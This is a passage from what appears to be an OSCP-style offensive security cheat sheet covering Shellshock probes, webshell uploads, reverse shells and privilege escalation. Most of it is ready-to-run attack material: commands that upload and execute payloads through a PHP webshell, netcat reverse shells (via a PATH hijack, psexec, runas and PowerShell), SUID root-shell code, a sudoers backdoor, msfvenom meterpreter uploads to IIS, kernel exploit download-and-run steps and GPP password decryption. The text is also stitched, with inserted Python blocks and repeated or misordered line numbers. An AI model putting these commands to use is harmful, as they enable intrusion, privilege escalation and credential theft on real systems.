1093 | **Handlers**
1094 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
1095 |
1096 | use exploit/multi/handler
1097 | set PAYLOAD
1098 | set LHOST
1099 | set LPORT
1100 | set ExitOnSession false
1101 | exploit -j -z
1102 |
1103 | Once the required values are completed the following command will execute your handler: `msfconsole -L -r `
1104 |
1105 | - SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
1106 |
1107 | use auxiliary/scanner/ssh/ssh_login
1108 | use post/multi/manage/shell_to_meterpreter
1109 |
1110 | - Shellshock
1111 |
1112 | - Testing for shell shock with NMap
1113 |
1114 | `root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`
1115 |
1116 | - git clone https://github.com/nccgroup/shocker
1117 |
1118 | `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`
1119 |
1120 | - Shell Shock SSH Forced Command
1121 | Check for forced command by enabling all debug output with ssh
1122 |
1123 | ssh -vvv
1124 | ssh -i noob noob@$ip '() { :;}; /bin/bash'
1125 |
1126 | - cat file (view file contents)
1127 |
1128 | echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$( 80, :DocumentRoot => Dir.pwd).start"
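On the defensive side, the `() { :;};` marker used in the probes above is exactly what to look for in web server logs, because CGI servers export request headers to the script as environment variables. The following Python is an added example, not part of the original guide: it parses Apache combined-format lines (the sample entries are constructed, not real traffic) and flags requests whose User-Agent, Referer or request line carries the Shellshock function-definition prefix; the field names and the regex are my own.

```python
import re
from typing import Dict, List

# A Shellshock probe is a bash function definition, "() { ... }", followed by
# ";" and the commands to run. The page's probes use both "() { :;};" and the
# tighter "() {:;};", so whitespace is optional everywhere.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache "combined" log format; group names are hypothetical.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Client-controlled fields that a CGI server turns into environment variables.
HEADER_FIELDS = ("ua", "referer", "req")


def parse_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into fields; {} if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}


def is_shellshock(entry: Dict[str, str]) -> bool:
    """True when any client-controlled field carries the function marker."""
    return any(SHELLSHOCK_RE.search(entry.get(k, "")) for k in HEADER_FIELDS)


def find_shellshock(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed entries that look like Shellshock probes."""
    return [e for e in map(parse_line, lines) if e and is_shellshock(e)]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -c \'id\'"',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "HEAD /cgi-bin/status HTTP/1.1" '
    '200 - "-" "() {:;}; echo vulnerable"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.8 - - [10/Oct/2023:13:56:02 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "() { :;}; /usr/bin/id" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} {hit['req']} "
              f"ua={hit['ua']!r} referer={hit['referer']!r}")
```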
1152 |
1153 | - Run a basic PHP http server
1154 | php -S $ip:80
1155 |
1156 | - Creating a wget VB Script on Windows:
1157 | [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
1158 |
1159 | - Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic Windows reverse shell and used to transfer files from a web server (the timeout 1 commands are required after each new line):
1160 |
1161 | echo Set args = Wscript.Arguments >> webdl.vbs
1162 | timeout 1
1163 | echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
1164 | timeout 1
1165 | echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
1166 | timeout 1
1167 | echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
1168 | timeout 1
1169 | echo xHttp.Open "GET", Url, False >> webdl.vbs
1170 | timeout 1
1171 | echo xHttp.Send >> webdl.vbs
1172 | timeout 1
1173 | echo with bStrm >> webdl.vbs
1174 | timeout 1
1175 | echo .type = 1 ' >> webdl.vbs
1176 | timeout 1
1177 | echo .open >> webdl.vbs
1178 | timeout 1
1179 | echo .write xHttp.responseBody >> webdl.vbs
1180 | timeout 1
1181 | echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
1182 | timeout 1
1183 | echo end with >> webdl.vbs
1184 | timeout 1
1185 | echo
1186 |
1187 | The file can be run using the following syntax:
1188 |
1189 | `C:\temp\cscript.exe webdl.vbs`
1190 |
1191 | - Mounting File Shares
1192 |
1193 | - Mount NFS share to /mnt/nfs
1194 | mount $ip:/vol/share /mnt/nfs
1195 |
1196 | - HTTP Put
1197 | nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php'
1199 |
1200 | - Uploading Files
1201 | -------------------------------------------------------------------------------------------------------------
1202 |
1203 | - SCP
1204 |
1205 | scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
1206 |
1207 | scp localfile username@$ip:~/Folder/
1208 |
1209 | scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~
1210 |
1211 |
1212 | - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
1213 |
1214 | `davtest -move -sendbd auto -url http://$ip`
1215 |
1216 | https://github.com/cldrn/davtest
1217 |
1218 | You can also upload a file using the PUT method with the curl command:
1219 |
1220 | `curl -T 'leetshellz.txt' 'http://$ip'`
1221 |
1222 | And rename it to an executable file using the MOVE method with the curl command:
1223 |
1224 | `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
1225 |
1226 | - Upload shell using limited php shell cmd
1227 | use the webshell to download and execute the meterpreter
1228 | curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php
1229 | curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
1230 | curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
1233 |
1234 | - TFTP
1235 | mkdir /tftp
1236 | atftpd --daemon --port 69 /tftp
1237 | cp /usr/share/windows-binaries/nc.exe /tftp/
1238 | EX. FROM WINDOWS HOST:
1239 | C:\Users\Offsec>tftp -i $ip get nc.exe
1240 |
1241 | - FTP
1242 | apt-get update && apt-get install pure-ftpd
1243 |
1244 | #!/bin/bash
1245 | groupadd ftpgroup
1246 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser
1247 | pure-pw useradd offsec -u ftpuser -d /ftphome
1248 | pure-pw mkdb
1249 | cd /etc/pure-ftpd/auth/
1250 | ln -s ../conf/PureDB 60pdb
1251 | mkdir -p /ftphome
1252 | chown -R ftpuser:ftpgroup /ftphome/
1253 |
1254 | /etc/init.d/pure-ftpd restart
1255 |
1256 | - Packing Files
1257 | -------------------------------------------------------------------------------------------------------------
1258 |
1259 | - Ultimate Packer for eXecutables
1260 | upx -9 nc.exe
1261 |
1262 | - exe2bat - Converts EXE to a text file that can be copied and pasted
1264 | locate exe2bat
1265 | wine exe2bat.exe nc.exe nc.txt
1266 |
1267 | - Veil - Evasion Framework -
1268 | https://github.com/Veil-Framework/Veil-Evasion
1269 | apt-get -y install git
1270 | git clone https://github.com/Veil-Framework/Veil-Evasion.git
1271 | cd Veil-Evasion/
1272 | cd setup
1273 | setup.sh -c
1274 |
1275 | Privilege Escalation
1276 | ==================================================================================================================
1277 |
1278 | *Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*
1279 |
1280 |
1281 | - Linux Privilege Escalation
1282 | ------------------------------------------------------------------------------------------------------------------------
1283 |
1284 | - De facto Linux Privilege Escalation Guide - A much more thorough guide for Linux enumeration:
1285 | [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
1286 |
1287 | - Try the obvious - Maybe the user can sudo to root:
1288 |
1289 | `sudo su`
1290 |
1291 | - Here are the commands I have learned to use to perform Linux enumeration and privilege escalation:
1292 |
1293 | What services are running as root?:
1294 |
1295 | `ps aux | grep root`
1296 |
1297 | What files run as root / SUID / GUID?:
1298 |
1299 | find / -perm -2000 -user root -type f -print
1300 | find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
1301 | find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
1302 | find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
1303 | find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
1304 | for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
1305 | find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
1306 |
1307 | What folders are world writeable?:
1308 |
1309 | find / -writable -type d 2>/dev/null # world-writeable folders
1310 | find / -perm -222 -type d 2>/dev/null # world-writeable folders
1311 | find / -perm -o w -type d 2>/dev/null # world-writeable folders
1312 | find / -perm -o x -type d 2>/dev/null # world-executable folders
1313 | find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
1314 |
1315 | - There are a few scripts that can automate the linux enumeration process:
1316 |
1317 | - Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blind spot during your OSCP course.
1318 |
1319 | - LinuxPrivChecker.py - My favorite automated linux priv enumeration checker -
1320 |
1321 | [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)
1322 |
1323 | - LinEnum - (Recently Updated)
1324 |
1325 | [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)
1326 |
1327 | - linux-exploit-suggester (Recently Updated)
1328 |
1329 | [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)
1330 |
1331 | - Highon.coffee Linux Local Enum - Great enumeration script!
1332 |
1333 | `wget https://highon.coffee/downloads/linux-local-enum.sh`
1334 |
1335 | - Linux Privilege Exploit Suggester (Old has not been updated in years)
1336 |
1337 | [https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
1338 |
1339 | - Linux post exploitation enumeration and exploit checking tools
1340 |
1341 | [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)
1342 |
1343 |
1344 | Handy Kernel Exploits
1345 |
1346 | - CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
1347 |
1348 | [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)
1349 |
1350 | wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
1351 | $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
1352 | $ ./i-can-haz-modharden
1353 | [+] launching root shell!
1354 | # id
1355 | uid=0(root) gid=0(root)
1356 |
1357 | - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
1358 | [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)
1359 |
1360 | - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
1361 | [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/)
1362 | Linux CVE 2012-0056
1363 |
1364 | wget -O exploit.c http://www.exploit-db.com/download/18411
1365 | gcc -o mempodipper exploit.c
1366 | ./mempodipper
1367 |
1368 | - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
1369 | [https://dirtycow.ninja/](https://dirtycow.ninja/)
1370 | First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016
1371 |
1372 | - Run a command as a user other than root
1373 |
1374 | sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
1375 |
1376 | - Add a user or change a password
1377 |
1378 | /usr/sbin/useradd -p "$(openssl passwd -1 thePassword)" haxzor
1379 | echo thePassword | passwd haxzor --stdin
1380 |
1381 | - Local Privilege Escalation Exploit in Linux
1382 |
1383 | - **SUID** (**S**et owner **U**ser **ID** up on execution)
1384 | SUID C binaries are often used to spawn a shell as the superuser; update the UID / GID and shell as required.
1385 |
1386 | Below are some quick copy and paste examples for various shells:
1389 |
1390 | SUID C Shell for /bin/bash
1391 |
1392 | #define _GNU_SOURCE   /* setresuid() is a GNU extension */
1393 | #include <stdlib.h>   /* system() */
1394 | #include <unistd.h>   /* setresuid() */
1395 |
1396 | int main(void){
1397 |     setresuid(0, 0, 0);
1398 |     system("/bin/bash");
1399 | }
1396 |
1397 | SUID C Shell for /bin/sh
1398 |
1399 | int main(void){
1400 | setresuid(0, 0, 0);
1401 | system("/bin/sh");
1402 | }
1403 |
1404 | Building the SUID Shell binary
1405 | gcc -o suid suid.c
1406 | For 32 bit:
1407 | gcc -m32 -o suid suid.c
1408 |
1409 | - Create and compile an SUID from a limited shell (no file transfer). Use printf (or echo -e): bash's builtin echo does not expand \n, which leaves literal backslashes in the C source and breaks the compile.
1410 |
1411 | printf '#define _GNU_SOURCE\n#include <stdlib.h>\n#include <unistd.h>\nint main(void){\nsetgid(0);\nsetuid(0);\nsystem("/bin/sh");\n}\n' > privsc.c
1412 | gcc privsc.c -o privsc
1413 |
1414 | - Handy command if you can get root to run it (a root cron job or a script run via sudo). It appends a passwordless sudo rule for www-data to /etc/sudoers; sudo refuses a world-writable sudoers, which is why the mode is put back to 440 afterwards:
1415 |
1416 | `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`
1417 |
1418 | - You may find a command is being executed by root without an absolute path (a cron job or script calling plain `ssh`). If you can influence the PATH that process uses, a directory you control placed first in PATH makes your file run instead. In the example below, ssh is replaced with a reverse-shell script connecting to 10.10.10.1 on
1420 | port 4444. This is PATH hijacking, not a SUID binary: the shell you get runs with the privileges of whatever process called ssh.
1421 |
1422 | export PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
1423 | printf '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f\n' > /tmp/ssh
1424 | chmod +x /tmp/ssh
1425 |
1426 | - SearchSploit
1427 |
1428 | searchsploit -u          # update the local exploit-db copy first
1428 | searchsploit apache 2.2
1429 | searchsploit "Linux Kernel"
1430 | searchsploit linux 2.6 | grep -i ubuntu | grep local
1431 | searchsploit slmail
1432 |
1433 | - Kernel Exploit Suggestions for Kernel Version 3.0.0 (pass the output of `uname -r`)
1434 |
1435 | `/usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`
1436 |
1437 | - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***
1438 |
1439 | [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
1440 |
1441 | - Collect the root password hash (readable only as root; crack it offline, see Password Hash Attacks below)
1442 |
1443 | `grep root /etc/shadow`
1444 |
1445 | - Find and display the proof.txt or flag.txt - LOOT!
1446 |
1447 | cat $(find / -name proof.txt 2>/dev/null)
1448 |
1449 | - Windows Privilege Escalation
1450 | --------------------------------------------------------------------------------------------------------------------------
1451 |
1452 | - Windows Privilege Escalation resource
1453 | http://www.fuzzysecurity.com/tutorials/16.html
1454 |
1455 | - Try the getsystem command using meterpreter - rarely works but is worth a try.
1456 |
1457 | `meterpreter > getsystem`
1458 |
1459 | - Metasploit Meterpreter Privilege Escalation Guide
1460 | https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
1461 |
1462 | - Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
1463 | http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
1464 |
1465 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
1466 |
1467 | cadaver http://$ip
1468 | dav:/> put aspshell.txt
1469 | Uploading aspshell.txt to `/aspshell.txt':
1470 | Progress: [=============================>] 100.0% of 38468 bytes succeeded.
1471 | dav:/> copy aspshell.txt aspshell3.asp;.txt
1472 | Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
1473 | dav:/> exit
1474 |
1474 | IIS 6 stops parsing the file name at the semicolon, so `aspshell3.asp;.txt` is handed to the ASP handler even though it was uploaded as a .txt. The handler's LPORT must match the payload (443 here):
1474 |
1475 | msf > use exploit/multi/handler
1476 | msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
1477 | msf exploit(handler) > set LHOST 1.2.3.4
1478 | msf exploit(handler) > set LPORT 443
1479 | msf exploit(handler) > set ExitOnSession false
1480 | msf exploit(handler) > exploit -j
1481 |
1482 | curl "http://$ip/aspshell3.asp;.txt"    # quote the URL: an unquoted ; ends the shell command
1483 |
1484 | [*] Started reverse TCP handler on 1.2.3.4:443
1485 | [*] Starting the payload handler...
1486 | [*] Sending stage (957487 bytes) to 1.2.3.5
1487 | [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
1488 |
1489 | - Windows privilege escalation exploits are often written in Python. When the target has no Python interpreter, compile them into a standalone executable with PyInstaller (run on Windows, or under Wine on Kali, so the output is a Windows .exe) and upload that:
1490 |
1491 | pip install pyinstaller
1492 | wget -O exploit.py http://www.exploit-db.com/download/31853
1493 | python pyinstaller.py --onefile exploit.py
1494 |
1495 | - Windows Server 2003 and IIS 6.0 privilege escalation using token impersonation (Churrasco):
1496 |
1497 | https://www.exploit-db.com/exploits/6705/
1498 |
1499 | https://github.com/Re4son/Churrasco
1500 |
1501 | c:\Inetpub>churrasco
1502 | churrasco
1503 | /churrasco/-->Usage: Churrasco.exe [-d] "command to run"
1504 |
1505 | c:\Inetpub>churrasco -d "net user /add "
1506 | c:\Inetpub>churrasco -d "net localgroup administrators /add"
1507 | c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD"
1508 |
1509 | - Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
1510 |
1511 | python pyinstaller.py --onefile ms11-080.py
1512 | ms11-080.exe -O XP
1513 |
1514 | - Powershell Exploits - You may find that some Windows privilege escalation exploits are written in PowerShell, and you may not have an interactive shell that allows you to enter the PowerShell prompt. Once the PowerShell script is uploaded to the server, here is a quick one-liner to run it from a basic (cmd.exe) shell:
1515 |
1516 | MS16-032 https://www.exploit-db.com/exploits/39719/
1517 |
1518 | `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"`
1519 |
1520 |
1521 | - Powershell Priv Escalation Tools
1522 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
1523 |
1524 | - Windows Run As - Switching users in Linux is trivial with `su`. Windows has no direct equivalent that drops you into a shell as another user, but here are 3 ways to run a command as a different user when you know the credentials.
1525 |
1526 | - Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have their username and password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and PsExec (on a 64 bit system).
1527 |
1528 | C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
1529 |
1530 | PsExec v2.2 - Execute processes remotely
1531 | Copyright (C) 2001-2016 Mark Russinovich
1532 | Sysinternals - www.sysinternals.com
1533 |
1534 | - Runas.exe is a handy Windows tool that allows you to run a program as another user so long as you know their password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and Runas.exe:
1535 |
1536 | C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
1537 | Enter the password for Test:
1538 | Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
1539 |
1540 | - PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.
1541 |
1542 | $username = ''
1543 | $password = ''
1544 | $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
1545 | $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
1546 | Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
1547 |
1548 | Next run this script using powershell.exe:
1549 |
1550 | `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"`
1551 |
1552 |
1553 | - Windows Service Configuration Viewer - Check for misconfigurations
1554 | in services that can lead to privilege escalation. If the service
1555 | binary is writable by a low-privileged user (below, Everyone has Full
1556 | control, (F)), you can replace the executable with your own and have
1556 | Windows execute whatever code you want as the service account (often
1556 | SYSTEM) the next time the service starts.
1557 | icacls scsiaccess.exe
1558 |
1559 | scsiaccess.exe
1560 | NT AUTHORITY\SYSTEM:(I)(F)
1561 | BUILTIN\Administrators:(I)(F)
1562 | BUILTIN\Users:(I)(RX)
1563 | APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
1564 | Everyone:(I)(F)
1565 |
1566 | - Compile a custom add user command in windows using C
1567 |
1568 | root@kali:~# cat useradd.c
1569 | #include <stdlib.h> /* system, NULL, EXIT_FAILURE */
1570 | int main ()
1571 | {
1572 |     /* runs in the service's context: adds the existing low-priv user "low" to Administrators */
1572 |     int i;
1573 |     i=system ("net localgroup administrators low /add");
1574 |     return 0;
1575 | }
1576 |
1577 | i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
1578 |
1579 | - Group Policy Preferences (GPP)
1580 | A common, useful misconfiguration in domain environments is an
1581 | unprotected GPP settings file: the cpassword attribute is AES-256
1581 | encrypted with a key Microsoft published, so anyone who can read
1581 | SYSVOL can recover the password. MS14-025 stopped new cpasswords
1581 | from being written, but old Groups.xml files are often still there.
1582 |
1583 | - map the Domain controller SYSVOL share
1584 |
1585 | `net use z: \\dc01\SYSVOL`
1586 |
1587 | - Find the GPP file: Groups.xml
1588 |
1589 | `dir /s Groups.xml`
1590 |
1591 | - Review the contents for passwords
1592 |
1593 | `type Groups.xml`
1594 |
1595 | - Decrypt using GPP Decrypt
1596 |
1597 | `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`
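The SYSVOL and Groups.xml steps above, as an added Python example that is not part of the original guide: it parses a Groups.xml, extracts every cpassword together with its userName, restores the base64 padding that GPP strips, and decrypts with the AES-256 key Microsoft published in the MS-GPPREF specification (which is what gpp-decrypt does). The Groups.xml below is constructed for the example; its cpassword value is the one quoted above. Decryption runs only if the `cryptography` package is installed; parsing and padding need nothing beyond the standard library.

```python
"""Added example (not from the guide): recover GPP cpasswords from Groups.xml.
The XML is constructed; the AES key is the one published in MS-GPPREF 2.2.1.1.4."""
import base64
import xml.etree.ElementTree as ET

# Key published by Microsoft (MS-GPPREF 2.2.1.1.4), the same one gpp-decrypt uses.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# Constructed sample Groups.xml; the cpassword string is the one quoted in the guide.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="Administrator (built-in)"/>
  </User>
</Groups>
"""


def extract_cpasswords(xml_text):
    """Return [(userName, cpassword)] for every <Properties> carrying a cpassword."""
    data = xml_text.encode() if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    found = []
    for props in root.iter("Properties"):
        cpw = props.get("cpassword")
        if cpw:
            found.append((props.get("userName") or props.get("newName") or "", cpw))
    return found


def cpassword_to_ciphertext(cpassword):
    """GPP drops the base64 '=' padding; put it back before decoding."""
    padded = cpassword + "=" * (-len(cpassword) % 4)
    raw = base64.b64decode(padded)
    if len(raw) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return raw


def decrypt_cpassword(cpassword):
    """AES-256-CBC, published key, zero IV; plaintext is UTF-16-LE with PKCS#7
    padding. Returns None when the cryptography package is not installed."""
    raw = cpassword_to_ciphertext(cpassword)
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    padded = dec.update(raw) + dec.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or corrupt cpassword")
    return padded[:-pad].decode("utf-16-le")


if __name__ == "__main__":
    for user, cpw in extract_cpasswords(SAMPLE_GROUPS_XML):
        try:
            shown = decrypt_cpassword(cpw) or "(install 'cryptography' to decrypt)"
        except ValueError as exc:
            shown = f"(undecryptable: {exc})"
        print(f"{user!r}: cpassword={cpw[:12]}... -> {shown}")
```

Run it against a real `Groups.xml` by reading the file and passing its contents to `extract_cpasswords`; the other GPP XML files (Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml) carry cpassword in the same attribute and parse the same way.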
1598 |
1599 | - Find and display the proof.txt or flag.txt - get the loot!
1600 |
1601 | `#meterpreter > run post/windows/gather/win_privs`
1602 | `cd\ & dir /b /s proof.txt`
1603 | `type c:\pathto\proof.txt`
1604 |
1605 |
1606 | Client, Web and Password Attacks
1607 | ==============================================================================================================================
1608 |
1609 | - Client Attacks
1610 | ------------------------------------------------------------------------------------------------------------
1611 |
1612 | - MS12-037- Internet Explorer 8 Fixed Col Span ID
1613 | wget -O exploit.html
1614 |
1615 | service apache2 start
1616 |
1617 | - JAVA Signed Jar client side attack
1618 | echo '' >
1621 | /var/www/html/java.html
1622 | User must hit run on the popup that occurs.
1623 |
1624 | - Linux Client Shells
1625 | [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)
1626 |
1627 | - Setting up the Client Side Exploit
1628 |
1629 | - Swapping Out the Shellcode
1630 |
1631 | - Injecting a Backdoor Shell into Plink.exe
1632 | backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip -P 4444 -s reverse_shell_tcp
1634 |
1635 | - Web Attacks
1636 | ---------------------------------------------------------------------------------------------------------
1637 |
1638 | - Web Shag Web Application Vulnerability Assessment Platform
1639 | webshag-gui
1640 |
1641 | - Web Shells
1642 | [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)
1643 | ls -l /usr/share/webshells/
1644 |
1645 | - Generate a PHP backdoor (generate) protected with the given
1646 | password (s3cr3t)
1647 | weevely generate s3cr3t
1648 | weevely http://$ip/weevely.php s3cr3t
1649 |
1650 | - Java Signed Applet Attack
1651 |
1652 | - HTTP / HTTPS Webserver Enumeration
1653 |
1654 | - OWASP Dirbuster
1655 |
1656 | - nikto -h $ip
1657 |
1658 | - Essential Iceweasel Add-ons
1659 | Cookies Manager
1660 | https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
1661 | Tamper Data
1662 | https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
1663 |
1664 | - Cross Site Scripting (XSS) - can have significant impacts, such as
1665 | cookie stealing and authentication bypass, redirecting the victim's
1666 | browser to a malicious HTML page, and more
1668 |
1669 | - Browser Redirection and IFRAME Injection
1670 |
1672 |
1673 | - Stealing Cookies and Session Information
1674 |
1678 | nc -nlvp 80
1679 |
1680 | - File Inclusion Vulnerabilities
1681 | -----------------------------------------------------------------------------------------------------------------------------
1682 |
1683 | - Local (LFI) and remote (RFI) file inclusion vulnerabilities are
1684 | commonly found in poorly written PHP code.
1685 |
1686 | - fimap - There is a Python tool called fimap which can be
1687 | leveraged to automate the exploitation of LFI/RFI
1688 | vulnerabilities that are found in PHP (sqlmap for LFI):
1689 | [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)
1690 |
1691 | - Gaining a shell from phpinfo()
1692 | fimap + phpinfo() Exploit - If a phpinfo() file is present,
1693 | it’s usually possible to get a shell, if you don’t know the
1694 | location of the phpinfo file fimap can probe for it, or you
1695 | could use a tool like OWASP DirBuster.
1696 |
1697 | - For Local File Inclusions look for the include() function in PHP
